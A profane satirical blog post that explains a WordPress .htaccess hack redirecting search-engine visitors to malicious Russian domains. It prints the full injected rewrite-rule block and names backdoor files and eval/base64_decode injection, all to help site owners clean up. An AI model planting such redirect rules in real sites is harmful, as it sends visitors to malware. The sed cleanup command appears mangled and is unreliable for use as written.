Greetings Arkham. Given the tragedy perpetrated this week by a psychopath using my moniker, I've decided to defer today's political tirade in favor of news from a transient I met during one of my more recent "escapes". We both had a 6 hour lay-over in a Greyhouse bus station when the topic came up regarding the 301 redirect hack plaguing WordPress users these days. Well, one thing led to another, so for a bottle of Jack and a little weed, I gave him a laptop and let him figure out this 2014reltime.ru 301 redirect thing. IT is not my forte...I'm more of a mayhem kind of guy and took his word for it. Below is what he wrote...before he got drunk and passed out, that is. So I'll pass on my usual social commentary out of respect....unlike the rest of those crazy satire writers out there anxious to be "timely". Funny I'm locked up as "crazy", and these fuckers are running amok at the keyboard with as much empathy as a serial killer and less ad revenue. Just goes to show: crazy is relative and some people just don't get comedy anymore. AH, HA, HAA, HAAA! Now that's funny....
A Transient in a Greyhound bus station explains the 2014Reltime.ru 301 redirect.
A Transient in a Greyhound bus station explains the 2014Reltime.ru 301 redirect.
I don’t know anything about
computers, OK? But, they tell me you
think you have a 301 redirect in the .htaccess file to http://2014-reltimes.ru/tyorem?13? If a search user
clicks on your link to the website in the Google search results and they are
warned the website has been infected, you probably do. And there goes your
traffic. A lot of the time, the first indication of being infected is seeing
your traffic plummet (for reasons other than lame content, that is). Now that
your site is in Google’s blacklist, you’ll need to request a malware review.
Pissed off yet?
If this reminds you of the kirm-sky.ru attack from a couple of
years ago, you need a hobby, but you’d be correct. Compromised sites redirect
search engine traffic to malicious sites. The “rest” traffic is not affected,
which helps hide the problem from webmasters who don’t really click on search
results to open their own sites. So what does the .htaccess looks like? Hackers
inject the following rewrite rules into .htaccess files:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*tellmewherethepornis.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*iamalittleteapot.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*reefermadness.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*tellmewherethepornis.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*iamalittleteapot.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*reefermadness.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*strangleCorp.*
[OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://networkdevision .ru/targetfile/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://networkdevision .ru/targetfile/index.php [R=301,L]
To hide these rules, the bastards
usually inject several screens of blank lines before the malicious code forcing
you to you scroll all the way down to find anything suspicious in the .htaccess
files. They might even place this file above the site root.
Those RewriteCond lines check if a
visitor came from one of those sites ( Google, Yahoo, Wikipedia, YouTube,
Twitter, Flickr, PornBonanza etc) and redirects them (the last RewriteRule
line) to a malicious site. URLs of the malicious sites change quite often, but
they all follow this pattern: Numbnuts.ru/dir/index.php where Numbnuts.ru is some malicious damned domain
that needs to be kicked in the nuts. As you can see with the “ru” extension in http://2014-reltimes.ru/tyorem?13, those assholes live in Russia. Sucuri could have told you that, but where's the thrill in that?
The domains are registered in small
batches but you can you can identify them by similar names because the
architects of this scam are just that unimaginative. They change domain names
of the malicious sites as well as the IP addresses of servers with the
malicious content after people complain and network administrators disconnect
their servers. But, they just move on to the next one and diversify their
infection methods like a crack whore. Most times, the creation day of these domains
is only mere days before you got the cyber-clap anyway.
Sometimes hosting providers try to temporarily
shut down websites and redirect visitors to a page that usually tells you the
site is temporarily unavailable. But, the redirect has a lower priority than
the malicious redirect in .htaccess files. So, in spite of your best efforts,
such disabled sites are still dangerous if people click on their links. The
same way a dead snake can still kill you. If you delete the .htacecss file, it
re-appears faster than someone you owe money. Then it breaks your permalinks
like a bookie breaks knee caps. So you limp back in, re-save the permalinks and
fix the problem…only to have new htaccess file being created immediately. You might also notice that your ftp server,
although closed, is running from the task manager and you can’t shut it. Son-of-a-bitch!
What is this thing doing? First
it harshes your buzz, then the .htaccess is modified to redirect users to some
Russian site. Finally, a backdoor is created. It can be inside /js/conf.php and
at /flops.php if it’s an osCommerce site. Try removing the file_manager.php
from the admin directory. If it’s
a WordPress hack find the file _cache.php and erase it (like maybe
wp-content\upload\_cache.php).
In some cases, the redirect code can
be in any of your PHP files. In this case, search for the following keywords: eval, base64_decode.
Go to the WordPress install
directory and look at any .php file since this crappy hack puts code right at
the beginning of all the files with letters that go on and on ...
They are a command, encoded
to hide it. Base64_decode will decode the letters into the command (the
redirect), and “eval” will run it. The easiest way I’ve heard of to fix this is
by logging into your server, if you have shell access, changing to the
wordpress directory, then running this command:
This bit of code looks for
all .php files in the current directory, searches them for the malicious code, then
kicks its ass. It should not interfere with any other code...unless the code
wants to be interfered with, that is, then it’s consensual.
find .
-iname "*.php" -exec sed -i "s/^..php .\*\*.
eval.base64_decode.\"aWYoZnVuY[^>]*>//" {} \;
If
that’s too complex or you don’t have shell access, try erasing all the .htaccess
files and replacing them with new empty ones. That MIGHT work. Also to prevent this try placing all your authentication files above the root directory so they cannot be accessed by browser. Otherwise visit
any of the assorted help forums on the web addressing this issue (unless their
traffic is being redirected, too). You are not alone and some of these people
actually know stuff like here: http://25yearsofprogramming.com/blog/20070705.htm. As for me, I’m just a transient in a bus station wasting
time. What in the hell are you listening to me for anyway?